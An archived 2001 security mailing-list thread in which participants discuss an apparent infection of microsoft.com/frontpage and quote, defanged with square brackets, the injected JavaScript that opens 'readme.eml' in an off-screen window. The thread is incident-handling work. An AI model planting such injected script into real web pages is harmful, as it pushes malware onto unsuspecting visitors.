Must have been 207.46.230.218 'cause it's offline now. > -----Original Message----- > From: Ken Pfeil [mailto:Kenat_private] > Sent: Wednesday, September 19, 2001 6:26 PM > To: Michael H. Warfield; Steve Cody > Cc: incidentsat_private > Subject: RE: Please tell me I'm wrong: microsoft.com infected > > > Which system? > > Canonical name: www.microsoft.akadns.net > Aliases: > www.microsoft.com > Addresses: > 207.46.230.218 > 207.46.197.102 > 207.46.197.100 > 207.46.230.220 > > > -----Original Message----- > > From: Michael H. Warfield [mailto:mhwat_private] > > Sent: Wednesday, September 19, 2001 5:54 PM > > To: Steve Cody > > Cc: incidentsat_private > > Subject: Re: Please tell me I'm wrong: microsoft.com infected > > > > > > On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote: > > > I just went to http://www.microsoft.com/frontpage, and my Symantec > > > Norton Antivirus popped up and denied access to readme.eml. > > > > > I could not view the source of the loaded page, so I can't verify that > > > it is definitely infected. > > > > Yes, indeedie do. Just did a wget > > http://www.microsoft.com/frontpage > > and here is what's on da bottom: > > > > [html][script language="JavaScript"]window.open("readme.eml", > > null, "resizable=no,top=6000,left=6000")[/script][/html] > > > > Defanged by turning angle brackets into square brackets even though > > it's not in an html attachment. ;-) > > > > > Steve > > > > > > > > > > > ------------------------------------------------------------------ > > ---------- > > > This list is provided by the SecurityFocus ARIS analyzer service. > > > For more information on this free incident handling, management > > > and tracking system please see: http://aris.securityfocus.com > > > > -- > > Michael H. Warfield | (770) 985-6132 | mhwat_private > > (The Mad Wizard) | (678) 463-0932 | > http://www.wittsend.com/mhw/ > NIC whois: MHW9 | An optimist believes we live in the best of all > PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! > > > ------------------------------------------------------------------ > ---------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 15:37:54 PDT